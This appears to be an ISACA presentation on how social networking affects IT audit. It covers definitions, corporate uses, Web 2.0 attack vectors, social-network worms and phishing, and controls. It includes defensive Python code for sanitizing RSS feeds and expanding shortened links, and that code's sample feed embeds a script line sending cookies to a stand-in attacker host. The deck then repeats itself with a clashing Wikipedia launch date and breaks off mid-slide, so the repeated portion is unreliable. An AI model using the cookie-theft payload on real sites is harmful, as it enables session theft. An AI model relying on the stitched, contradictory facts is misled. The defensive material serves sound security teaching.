www.isaca.org

The impact of social networking on the IT audit universe

Presenter: Nelson Gibbs, CIA, CISA, CISM, CGEIT, CISSP
Deloitte & Touche LLP

Today's agenda

• Definitions and terminology
• Why and how companies are using social networking
• Risks and challenges
• What is next in the world of social networking
• Q&A

Definitions and terminology

Social network: some definitions

• As defined in Wikipedia:
  – A social network is a social structure made of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency, such as values, visions, ideas, financial exchange, friendship, kinship, dislike, conflict or trade. The resulting structures are often very complex.
• As defined in Webmaster:
  – Social networking is a phenomenon defined by linking people to each other in some way. Digg is a popular example of a social network (using social bookmarking): users work together to rate news and are linked by rating choices or explicit identification of other members. Generally, social networks are used to allow or encourage various types of activity, whether commercial, social or some combination of the two.

What makes a social network so powerful?

• Metcalfe's law
  – The value of a telecommunications network is proportional to the square of the number of connected users of the system (n²).
  – Related to the fact that the number of unique connections in a network of n nodes can be expressed mathematically as the triangular number n(n–1)/2, which is proportional to n² asymptotically. http://en.wikipedia.org/wiki/Metcalfe's_Law
• Applying this to social networking: consider LinkedIn. It took 16 months to reach the first one million users; the latest million users were added in just 11 days.

What makes a social network so powerful? (cont.)

• Web 2.0
  – "Web 2.0" was first coined in 1999 and by 2004 had become used to describe the next evolution of the Web.
  – It's based on the notion that people who consume media, access the Internet and use the Web shouldn't passively absorb the flow of content from provider to viewer; rather, they should be active contributors, helping customize media and technology for their own purposes.
  – Social network sites, blogs, wikis and other collaborative technologies are the result.

Web 1.0 (Yesterday): power lies with institutions, platforms and technology
• Structured
• Siloed
• One size fits all
• Passive audience
• Unilateral

Web 2.0 (Today): power lies with users, communities and experiences
• Flexible
• Collaborative
• Communities
• Engaged users
• Multilateral

Social network: more terminology (cont.)

Social network analysis
• Mapping and measuring of relationships and flows among people, groups, organizations, computers or other information/knowledge processing entities.
• The nodes in the network are the people and groups, while the links show relationships or flows between the nodes.
• Provides both a visual and a mathematical analysis of human relationships.

Social network: more terminology (cont.)

Blogs
• Web sites where entries are made (such as in a journal or diary) and displayed in reverse chronological order; they often provide commentary or news on a particular subject.
• Some function as personal online diaries or logbooks.
• Combine text, images and links to other blogs and Web sites.
• Typically provide archives in calendar form, local search, syndication feeds, reader comment posting, trackback links from other blogs, blogroll links to other recommended blogs, and categories of entries tagged for retrieval by topic.

Social network: more terminology (cont.)

Microblogging
• Short, frequent posts with questions, information or current status.
• Twitter (public) and Yammer (private) are two examples.
• Social software (including Facebook, LinkedIn and MySpace) now prompts for "what's on your mind" or similar status or mood lines.

Social network: more terminology (cont.)

Wikis
• Web sites which allow users to easily add, remove, edit and change most available content.
• Effective for collaborative writing and self-service Web site creation and maintenance.

Social network: more terminology (cont.)

Wikis (cont.)
• Wikipedia, perhaps the best known wiki
  – Launched on 15 January 2001
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias
Statistics taken from http://www.bbc.co.uk/news/technology-12171977

Social network: more terminology (cont.)

Social networking software
• A range of tools which facilitate social networking.
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends, and personal networks.

Social network: more terminology (cont.)

Social networking software (cont.)
• Facebook, the biggest of them all
  – Over 500 million registered users
  – 50% of its active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
  Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%.

Social network: more terminology (cont.)

Social bookmarking and tagging
• Sites which allow users to share links to sites with others.
• Tags are metadata which classify content into categories.
• Can be used to aid searches, create tag clouds and link disparate sources.

Social network: more terminology (cont.)

Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic.
• RSS (Really Simple Syndication) or Atom syndication; .rss, .xml or .rdf files are used for the feeds.
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map.

Social network: more terminology (cont.)

Videos and photos
• Online collections of videos and photos from users.
• Users can upload, tag and rate content.

Social networking companies

Social media category               Popular examples
Wikis                               Wikitravel, Wikipedia, wikiHow, WikiBooks, The TV IV
Blogs                               LiveJournal, WordPress, Blogger, Technorati, Xanga
Social networking                   myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)     NewsGator, Bloglines, iGoogle, FeedBurner
Presence and microblogging          twitter, Pownce, jaiku, Hictu, tumblr
Social bookmarking and tagging      delicious, digg, reddit, newsvine, StumbleUpon
Online photo and video sharing      YouTube, flickr, shutterfly, last.fm, slideshare

Why and how companies are using social networking

Statistics on companies using social networking

[Chart not reproduced in this text.] Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf

Statistics on companies using social networking (cont.)

[Second chart not reproduced in this text; same data set and source as above.]

Companies typically adopt social media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships

Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed.
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains.
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world.

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using social media.

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup.

Increase employee productivity and operational efficiencies (cont.)

• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org

Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.

Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company.
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions.
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues.

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings.

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents.

Foster creativity, innovation and collaboration (cont.)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com

Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team

Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers.
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception.
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners.
• Allows consumers who know your products and services best to become a part of the new offering development process.

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value.

Enhance customer and partner relationships (cont.)

• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com

Enhance customer and partner relationships (cont.)

• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com

Enhance customer and partner relationships (cont.)

• City of Louisville, Kentucky
  – Interactive audit findings on the Web site, which allows users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit

Enhance customer and partner relationships (cont.)

• Amazon (Shelfari)
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com

Enhance customer and partner relationships (cont.)

• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.

Risks and challenges

Risks and challenges: farmers and mobsters

• Top Facebook applications
  Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
• There are now more than 500,000 active applications on the Facebook Platform.

Rank  Name                     Monthly active users
1     FarmVille                82,580,911
2     Static FBML              46,827,021
3     Birthday Cards           41,904,049
4     Café World               30,032,716
5     Facebook for iPhone      29,438,848
6     Texas HoldEm Poker       28,332,917
7     Slide FunSpace           25,630,033
8     Happy Aquarium (BETA)    24,915,971
9     Mafia Wars               24,704,179
10    Causes                   24,317,292

Risks and challenges (cont.)

• New security concerns and attack vectors, as a result of the shift in technology: Web services that are empowering server-side core technology components, and Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself.
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf):
  – Cross-site scripting ("XSS") in AJAX, e.g. the Samy worm that exploited an XSS flaw in MySpace.com
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: the browser replays the session cookies with each request, so injected script acts as the logged-in user
  – RSS/Atom injection: JavaScript injected into feed content to attack the client browser that renders the feed
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines, with no corresponding server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from SOAP messages
  – XPath injection in SOAP messages: bypass of authentication mechanisms
  – RIA thick client binary manipulation: issues with session management
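The RSS/Atom injection and XSS-in-AJAX items above share one server-side control: treat feed and user content as untrusted markup and allow-list what may reach the browser, rather than trusting client-side checks. The block below is an added Python example, not code from the presentation or from the Net-Square paper; the sample feed, its items, and the tag and attribute allow-lists are constructed for illustration.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample feed (not data from the presentation). The second item
# carries a script payload, an event-handler attribute and a javascript: link,
# the kind of content an attacker can get into a feed that a site aggregates.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed feed</title>
<item><title>Harmless</title><link>https://example.org/a</link>
<description>&lt;p&gt;Plain &lt;b&gt;bold&lt;/b&gt; text&lt;/p&gt;</description></item>
<item><title>Poisoned</title><link>javascript:alert(1)</link>
<description>&lt;p onmouseover="steal()"&gt;Click&lt;/p&gt;&lt;script&gt;document.location='https://evil.example/?c='+document.cookie&lt;/script&gt;&lt;a href="javascript:alert(1)"&gt;x&lt;/a&gt;</description></item>
</channel></rss>"""

# Assumed allow-lists: only these tags/attributes survive, and links must be http(s).
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")


class FeedSanitizer(HTMLParser):
    """Rebuilds a description keeping only allow-listed tags and attributes.
    <script>/<style> bodies are dropped; every other tag is removed and all
    text is re-escaped, so nothing executable reaches the rendering browser."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value \
                    and value.strip().lower().startswith(SAFE_SCHEMES):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
            return
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))

    def result(self):
        return "".join(self.out)


def sanitize_html(fragment):
    """Return an allow-listed, re-escaped version of an HTML fragment."""
    parser = FeedSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def safe_link(url):
    """Keep only http(s) links; javascript:/data: and friends become empty."""
    url = (url or "").strip()
    return url if url.lower().startswith(SAFE_SCHEMES) else ""


def sanitize_feed(xml_text):
    """Parse an RSS document and return items that are safe to hand to a page."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        items.append({
            "title": html.escape(item.findtext("title", "")),
            "link": safe_link(item.findtext("link", "")),
            "description": sanitize_html(item.findtext("description", "")),
        })
    return items


if __name__ == "__main__":
    for entry in sanitize_feed(SAMPLE_RSS):
        print(entry)
```

The sanitizer runs where the feed is aggregated, not in the browser, which is the point of the "client-side validation" item: the client can be bypassed, the server cannot. Extending it to Atom only requires reading `entry`/`content` elements instead of `item`/`description`; the allow-listing logic is unchanged.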
Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction: a Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.

Risks and challenges (cont.)

  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element: they all take advantage of the implied trust that social networking users have with each other.

Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum in InfoSec Magazine, May 2008

• Trust: data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• Attackers may also take advantage of URL shortening (bit.ly, tr.im, tinyurl.com, etc.), which hides the real destination of a link until it is followed.
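One check a practitioner can run before following a shortened link: walk the redirect chain with HEAD requests (so no page body is ever fetched), cap the number of hops, detect loops, and flag a final host that merely contains a trusted brand name. This is an added Python example, not code from the presentation; the redirect table, the shortener host list and the brand list are constructed assumptions, and `http_head` is the live variant that the offline walk-through does not use.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Constructed assumptions for the offline demo (not data from the presentation).
SHORTENER_HOSTS = {"bit.ly", "tr.im", "tinyurl.com", "t.co"}
BRAND_DOMAINS = ("facebook.com", "linkedin.com", "twitter.com")
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_HOPS = 5

# Constructed redirect table standing in for live HTTP responses:
# url -> (status code, Location header or None).
FAKE_RESPONSES = {
    "http://bit.ly/abc123": (301, "http://tr.im/xyz"),
    "http://tr.im/xyz": (302, "http://facebook.com.login-verify.example/"),
    "http://facebook.com.login-verify.example/": (200, None),
    "http://bit.ly/good": (301, "https://www.facebook.com/"),
    "https://www.facebook.com/": (200, None),
    "http://bit.ly/loop1": (301, "http://bit.ly/loop2"),
    "http://bit.ly/loop2": (301, "http://bit.ly/loop1"),
}


def fake_head(url):
    """Offline stand-in for an HTTP HEAD request against the table above."""
    return FAKE_RESPONSES.get(url, (404, None))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # do not auto-follow; the chain is walked explicitly below


def http_head(url):
    """Live variant: one HEAD request, redirect not followed, body never fetched."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # a 3xx surfaces here when not followed
        return err.code, err.headers.get("Location")
    except urllib.error.URLError:
        return 0, None


def expand_url(url, head=fake_head, max_hops=MAX_HOPS):
    """Follow Location headers hop by hop. Returns (chain of URLs, verdict)."""
    chain, seen = [url], {url}
    while True:
        status, location = head(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain, "resolved"
        location = urljoin(chain[-1], location)  # Location may be relative
        if location in seen:
            return chain, "redirect-loop"
        if len(chain) > max_hops:
            return chain, "too-many-hops"
        seen.add(location)
        chain.append(location)


def is_lookalike(host):
    """True when a brand name appears inside a host that is not that brand's
    domain (e.g. facebook.com.login-verify.example), a common phishing trick."""
    host = (host or "").lower()
    for brand in BRAND_DOMAINS:
        if host == brand or host.endswith("." + brand):
            return False
        if brand.split(".")[0] in host:
            return True
    return False


def assess(url, head=fake_head):
    """Expand a link and return the final URL, hop count and any warning flags."""
    chain, verdict = expand_url(url, head)
    flags = []
    if (urlparse(url).hostname or "").lower() in SHORTENER_HOSTS and len(chain) > 1:
        flags.append("shortened")
    if verdict != "resolved":
        flags.append(verdict)
    if is_lookalike(urlparse(chain[-1]).hostname):
        flags.append("lookalike-host")
    return {"final": chain[-1], "hops": len(chain) - 1, "flags": flags}


if __name__ == "__main__":
    for link in ("http://bit.ly/abc123", "http://bit.ly/good", "http://bit.ly/loop1"):
        print(link, "->", assess(link))
```

Pass `head=http_head` to `assess` to run it against real URLs; the hop cap and loop detection matter there, because shortener chains are sometimes nested several deep or deliberately circular.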
Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment.

Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment (cont.)

"Dearest One…

Sorry for the nature of this email, please bear with me.

I am Natasha Kone, a 22 year old lady now, i was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School, my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……" - See http://www.419legal.org for more details

• The 419 scams have evolved with the technology; they are now using LinkedIn to target specific individuals.

Risks and challenges (cont.)

• Reputation: damage to company brand/reputation through inappropriate comments or remarks from employees.
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation: third-party material such as essays, articles and photographs is used without written consent from the proprietor.
• Intellectual property theft: harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium.

Risks and challenges (cont.)

• Failures in the use of social media: most companies that use social media don't approach it the way they would other mission-critical technology.
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues.
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail.

"Fully half of all social media investments will fail." - Gartner

Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1,000 times." - Michael Scott, from The Office

• Productivity: users employ social media tools for nonproductive purposes such as socializing ("social notworking"). http://news.bbc.co.uk/2/hi/business/8325865.stm

Risks and challenges (cont.)

• Technical integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern.
  – "Sign in using your account with": Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr

Risks and challenges (cont.)

• Information hoarding: in many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification: researchers currently face challenges quantifying social networking benefits.
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all."
  – http://en.wikipedia.org/wiki/Beckstrom's_law

Risks and challenges (cont.)

• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.

A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time." - Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place." - Eric Schmidt, CEO, Google Inc.

A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence: limited attempts to address it

Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)

Responding to the risks and challenges (cont.)

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department

Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443, indistinguishable from ordinary web traffic at the port level
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL (inspecting content inside SSL requires the firewall to decrypt the session, which carries its own policy and privacy implications)
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access

What is next in the world of social networking

Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology.
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle

What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, more than four times the 2009 figure of 140 million. Source: eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them.

Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." - Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go." - Biz Stone, co-founder of Twitter

Q&A

Today's presenters

Nelson Gibbs
Senior Manager, AERS (Audit & Enterprise Risk Services)
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241

This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
Today’s agenda
• Definitions and terminology (3-17)
• Why and how companies are using social networking (18-33)
• Risks and challenges (34-52)
• What is next in the world of social networking (53-56)
• Q&A

Definitions and terminology

Social network — Some definitions
• As defined in Wikipedia:
  – A social network is a social structure made of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency, such as values, visions, ideas, financial exchange, friendship, kinship, dislike, conflict or trade. The resulting structures are often very complex.
• As defined in Webmaster:
  – Social networking is a phenomenon defined by linking people to each other in some way. Digg is a popular example of a social network (using social bookmarking). Users work together to rate news and are linked by rating choices or explicit identification of other members. Generally, social networks are used to allow or encourage various types of activity, whether commercial, social or some combination of the two.

What makes a Social Network so powerful?
• Metcalfe’s law
  – The value of a telecommunications network is proportional to the square of the number of connected users of the system (n²).
• Related to the fact that the number of unique connections in a network of n nodes can be expressed mathematically as the triangular number n(n–1)/2, which is proportional to n² asymptotically. http://en.wikipedia.org/wiki/Metcalfe's_law
• Applying this to Social Networking — consider LinkedIn: it took 16 months to reach the first one million users. The latest million users were added in just 11 days.
What makes a Social Network so powerful? (cont.)
• Web 2.0
  – “Web 2.0” was first coined in 1999 and by 2004 had become used to describe the next evolution of the Web.
  – It’s based on the notion that people who consume media, access the Internet and use the Web shouldn’t passively absorb the flow of content from provider to viewer; rather, they should be active contributors, helping customize media and technology for their own purposes.
  – Social network sites, blogs, wikis and other collaborative technologies are the result.

Web 1.0 (Yesterday): power lies with institutions, platforms and technology
• Structured
• Siloed
• One size fits all
• Passive audience
• Unilateral

Web 2.0 (Today): power lies with users, communities and experiences
• Flexible
• Collaborative
• Communities
• Engaged users
• Multilateral
Social network — More terminology (cont.)
Social network analysis
• Mapping and measuring of relationships and flows among people, groups, organizations, computers or other information/knowledge processing entities
• The nodes in the network are the people and groups, while the links show relationships or flows between the nodes
• Provides both a visual and a mathematical analysis of human relationships

Social network — More terminology (cont.)
Blogs
• Web sites where entries are made (such as in a journal or diary), displayed in reverse chronological order; often provide commentary or news on a particular subject
• Some function as personal online diaries or logbooks
• Combine text, images and links to other blogs and Web sites
• Typically provide archives in calendar form, local search, syndication feeds, reader comment posting, trackback links from other blogs, blogroll links to other recommended blogs, and categories of entries tagged for retrieval by topic

Social network — More terminology (cont.)
Microblogging
• Short, frequent posts with questions, information or current status
• Twitter (public) and Yammer (private) are two examples
• Social software (including Facebook, LinkedIn and MySpace) now prompts for “what’s on your mind” or similar status or mood lines
Social network — More terminology (cont.)
Wikis
• Web sites which allow users to easily add, remove, edit and change most available content
• Effective for collaborative writing and self-service Web site creation and maintenance

Social network — More terminology (cont.)
Wikis (cont.)
• Wikipedia – perhaps the best known Wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias
Statistics taken from http://www.bbc.co.uk/news/technology-12171977

Social network — More terminology (cont.)
Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends, and personal networks
Social network — More terminology (cont.)
Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America’s most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google’s 7.0%

Social network — More terminology (cont.)
Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources

Social network — More terminology (cont.)
Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, and .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map

Social network — More terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
Social Networking Companies
Social Media: Popular Examples
• Wikis: Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
• Blogs: livejournal, WordPress, Blogger, Technorati, xanga
• Social Networking: myspace.com, LinkedIn, facebook, friendster, plaxo
• RSS (Really Simple Syndication): newsgator, Bloglines, iGoogle, FeedBurner
• Presence and Microblogging: twitter, Pownce, jaiku, Hictu, tumblr
• Social Bookmarking and Tagging: delicious, digg, reddit, newsvine, StumbleUpon
• Online Photo and Video Sharing: YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking

Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf

Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf

Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system for a company’s intellectual assets to be easily captured, stored and accessed
• Reduce the net volume of e-mail and allow users to “pull” information at their convenience, as opposed to spending time reading through mass e-mail chains
